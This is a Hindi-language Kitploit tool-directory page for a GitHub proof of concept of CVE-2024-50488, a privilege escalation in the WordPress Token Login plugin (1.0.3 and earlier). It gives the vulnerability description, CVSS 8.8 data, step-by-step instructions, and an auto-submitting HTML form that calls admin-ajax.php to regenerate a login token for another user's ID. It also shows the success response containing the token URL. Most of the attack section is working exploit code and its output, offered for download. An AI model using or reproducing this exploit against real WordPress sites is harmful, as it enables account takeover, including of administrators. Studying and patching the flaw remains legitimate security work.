Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-50488 — Token Login <= 1.0.3 - प्रमाणित (Subscriber+) विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-50488
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-50488

CVE-2024-50488

Token Login <= 1.0.3 - प्रमाणित (Subscriber+) विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50488

टोकन लॉगिन <= 1.0.3 - प्रमाणित (Subscriber+) विशेषाधिकार वृद्धि

विवरण:

सुरक्षित टोकनयुक्त URL का उपयोग करके ऑटो लॉगिन। रोल वार लॉगिन प्रतिबंध। वर्डप्रेस के लिए यह प्लगइन 1.0.3 तक के सभी संस्करणों में खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है। यह इसलिए है क्योंकि प्लगइन ठीक से सत्यापित नहीं करता है कि किसी उपयोगकर्ता के पास अन्य उपयोगकर्ताओं के लिए लॉगिन टोकन उत्पन्न करने की अनुमतियाँ हैं या नहीं। इससे प्रमाणित हमलावरों के लिए, सब्सक्राइबर-स्तरीय पहुंच और उससे ऊपर के, व्यवस्थापकों सहित अन्य के रूप में लॉग इन करना संभव हो जाता है।

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login

POC

लॉग इन करें और इस HTML को सबमिट करें। URL को अपने वर्डप्रेस साइट पर बदलें जहाँ आप लॉग इन हैं। उस उपयोगकर्ता का ID बदलें जिसके लिए आप टोकन उत्पन्न करना चाहते हैं। URL कॉपी करें और आप उनके रूप में लॉगिन कर सकते हैं।

root@kitploit:~
<html>
  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tl&#95;admin&#95;ajax&#95;action" />
      <input type="hidden" name="method" value="regenerate&#95;token" />
      <input type="hidden" name="user&#95;id" value="7" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

प्रतिक्रिया

root@kitploit:~
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}
टूल डाउनलोड करें